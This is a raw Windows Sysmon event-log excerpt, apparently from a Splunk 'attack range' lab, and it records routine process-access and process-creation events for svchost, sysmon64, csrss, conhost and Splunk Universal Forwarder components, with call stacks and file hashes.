09:15:54.641{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050967Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:54.641{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050966Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:54.641{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050965Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:54.641{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050964Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:54.641{5EBD8912-7F2D-614D-0500-00000000FC01}408524C:\Windows\system32\csrss.exe{5EBD8912-8BCA-6151-527A-00000000FC01}4452C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050963Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:54.641{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8BCA-6151-527A-00000000FC01}4452C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001050962Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:54.627{5EBD8912-8BCA-6151-527A-00000000FC01}4452C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001050961Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:54.241{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E795B8328EFAD5ABFB083B99E40FE742,SHA256=3E951192D8B5845A1E38F9CD93FDA70D0AC275F2F2668B5C18E5083BCF53C119,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050960Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:54.179{5EBD8912-8BC9-6151-517A-00000000FC01}33805824C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050959Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:53.995{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8BC9-6151-517A-00000000FC01}3380C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050958Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:53.995{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050957Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:53.995{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050956Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:53.995{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050955Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:53.995{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050954Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:53.995{5EBD8912-7F2D-614D-0500-00000000FC01}408368C:\Windows\system32\csrss.exe{5EBD8912-8BC9-6151-517A-00000000FC01}3380C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050953Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:53.995{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8BC9-6151-517A-00000000FC01}3380C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000979665Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:55.964{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3DE82398FFEC47735E53B5E9E067F053,SHA256=0045F5DC7B2F92AFB0D256582FC9B39D68F9A7ECDB3F1B707D84434087956579,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050989Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:55.940{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8BCB-6151-547A-00000000FC01}6992C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050988Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:55.940{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050987Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:55.940{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050986Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:55.940{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050985Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:55.940{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050984Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:55.940{5EBD8912-7F2D-614D-0500-00000000FC01}408368C:\Windows\system32\csrss.exe{5EBD8912-8BCB-6151-547A-00000000FC01}6992C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050983Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:55.940{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8BCB-6151-547A-00000000FC01}6992C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001050982Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:55.925{5EBD8912-8BCB-6151-547A-00000000FC01}6992C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001050981Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:55.495{5EBD8912-8BCB-6151-537A-00000000FC01}44845816C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001050980Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:55.278{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=37F3BFAB688121085ADDBBBA61435C2A,SHA256=DECF73CCFC5F32DD549BCFF22883EE4CA25321ABBB7885F5DB57184611CCE428,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050979Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:55.256{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8BCB-6151-537A-00000000FC01}4484C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050978Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:55.256{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050977Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 